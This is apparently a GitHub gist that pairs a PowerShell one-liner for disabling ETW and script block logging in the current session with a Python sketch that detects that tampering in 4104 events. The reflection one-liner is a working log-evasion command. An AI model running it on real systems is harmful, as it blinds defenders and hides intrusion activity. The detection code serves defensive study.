@dezhub
Forked from tandasat/KillETW.ps1
Created January 25, 2019 15:32
Disable ETW of the current PowerShell session
#
# This PowerShell command sets System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled to 0,
# which effectively disables Suspicious ScriptBlock Logging etc. Note that, for readability, this command itself
# does not attempt to bypass Suspicious ScriptBlock Logging.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
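
Because the command above does not hide itself from script block logging, the script block that flips the flag is itself recorded as event 4104 in the Microsoft-Windows-PowerShell/Operational log before logging stops. The following detection sketch is an added example, not part of the original gist; the record shape (`EventID`, `RecordId`, `ScriptBlockText`), the function names and the sample records are assumptions constructed for illustration.

```python
import re

# Identifiers taken from the gist's one-liner, lower-cased for matching.
TARGET_TYPE = "system.management.automation.tracing.psetwlogprovider"
PROVIDER_FIELD = "etwprovider"
ENABLED_FIELD = "m_enabled"
WRITE_CALL = re.compile(r"\.\s*setvalue\s*\(", re.IGNORECASE)
READ_CALL = re.compile(r"\.\s*getvalue\s*\(", re.IGNORECASE)

def classify_script_block(text):
    """Return 'tamper', 'inspect' or None for one script block's text."""
    folded = text.lower()
    if not all(s in folded for s in (TARGET_TYPE, PROVIDER_FIELD, ENABLED_FIELD)):
        return None
    if WRITE_CALL.search(text):
        return "tamper"   # the enabled flag is written via reflection
    if READ_CALL.search(text):
        return "inspect"  # the flag is only read, e.g. by a health check
    return None

def scan_events(events):
    """Return [(RecordId, verdict)] for 4104 events that reference the flag."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        verdict = classify_script_block(ev.get("ScriptBlockText", ""))
        if verdict:
            hits.append((ev["RecordId"], verdict))
    return hits

# Constructed sample records (assumed shape: EventID, RecordId, ScriptBlockText).
GIST_LINE = ("[Reflection.Assembly]::LoadWithPartialName('System.Core')"
    ".GetType('System.Diagnostics.Eventing.EventProvider')"
    ".GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly"
    ".GetType('System.Management.Automation.Tracing.PSEtwLogProvider')"
    ".GetField('etwProvider','NonPublic,Static').GetValue($null),0)")
READ_ONLY = GIST_LINE.replace(".SetValue(", ".GetValue(").replace(",0)", ")")
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordId": 101, "ScriptBlockText": "Get-Process | Sort-Object CPU"},
    {"EventID": 4104, "RecordId": 102, "ScriptBlockText": GIST_LINE},
    {"EventID": 4104, "RecordId": 103, "ScriptBlockText": READ_ONLY.upper()},
    {"EventID": 4103, "RecordId": 104, "ScriptBlockText": GIST_LINE},
]

if __name__ == "__main__":
    for record_id, verdict in scan_events(SAMPLE_EVENTS):
        print(record_id, verdict)
```

A "tamper" hit that is followed by no further 4104 events from the same process is the pattern worth alerting on, since the silence is the effect the gist describes.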